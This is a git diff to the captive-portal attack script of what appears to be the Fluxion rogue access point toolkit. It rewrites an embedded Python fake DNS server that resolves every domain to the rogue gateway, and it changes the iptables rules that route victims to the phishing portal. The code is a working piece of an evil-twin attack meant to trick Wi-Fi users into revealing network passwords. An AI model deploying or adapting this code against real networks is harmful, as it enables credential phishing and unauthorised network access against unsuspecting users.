diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 2d49fd8..e859175 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -711,48 +711,53 @@ index-file.names = ( # Create a DNS service with python, forwarding all traffic to gateway. echo "\ +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + import socket + class DNSQuery: - def __init__(self, data): - self.data=data - self.dominio='' + def __init__(self, data): + self.data=data + self.dominio='' - tipo = (ord(data[2]) >> 3) & 15 - if tipo == 0: - ini=12 - lon=ord(data[ini]) - while lon != 0: - self.dominio+=data[ini+1:ini+lon+1]+'.' - ini+=lon+1 - lon=ord(data[ini]) + tipo = (ord(data[2]) >> 3) & 15 + if tipo == 0: + ini=12 + lon=ord(data[ini]) + while lon != 0: + self.dominio+=data[ini + 1:ini + lon + 1] + '.' + ini += lon + 1 + lon=ord(data[ini]) + + def respuesta(self, ip): + packet='' + if self.dominio: + packet+=self.data[:2] + '\x81\x80' + packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' + packet+=self.data[12:] + packet+='\xc0\x0c' + packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' + packet+=str.join('', map(lambda x: chr(int(x)), ip.split('.'))) + return packet - def respuesta(self, ip): - packet='' - if self.dominio: - packet+=self.data[:2] + \"\x81\x80\" - packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' - packet+=self.data[12:] - packet+='\xc0\x0c' - packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' - packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) - return packet if __name__ == '__main__': - ip='$CaptivePortalGatewayAddress' - print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip + ip='$CaptivePortalGatewayAddress' + print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip - udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - udps.bind(('',53)) + udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + udps.bind((ip, 53)) - try: - while 1: - data, addr = udps.recvfrom(1024) - p=DNSQuery(data) - udps.sendto(p.respuesta(ip), addr) - print 'Request: %s -> %s' % (p.dominio, ip) - except KeyboardInterrupt: - print 'Finalizando' + try: + while True: + data, addr = udps.recvfrom(1024) + p=DNSQuery(data) + udps.sendto(p.respuesta(ip), addr) + print 'Request: %s -> %s' % (p.dominio, ip) + except KeyboardInterrupt: + print 'Finalizando' udps.close()\ " >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" @@ -1090,8 +1095,7 @@ captive_portal_unset_routes() { ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null } -# Set up DHCP / WEB server -# Set up DHCP / WEB server +# Set up DHCP / WEB server / DNS Firewall captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. @@ -1107,15 +1111,10 @@ captive_portal_set_routes() { iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain - iptables -P FORWARD ACCEPT - - iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ - --to-destination $CaptivePortalGatewayAddress:80 - iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ - --to-destination $CaptivePortalGatewayAddress:443 - iptables -A INPUT -p tcp --sport 443 -j ACCEPT - iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT - iptables -t nat -A POSTROUTING -j MASQUERADE + iptables -A INPUT -p tcp --dport 443 -j ACCEPT + iptables -A INPUT -p tcp --dport 80 -j ACCEPT + iptables -A INPUT -p udp --dport 53 -j ACCEPT + iptables -A INPUT -p udp --dport 67 -j ACCEPT } captive_portal_stop_interface() {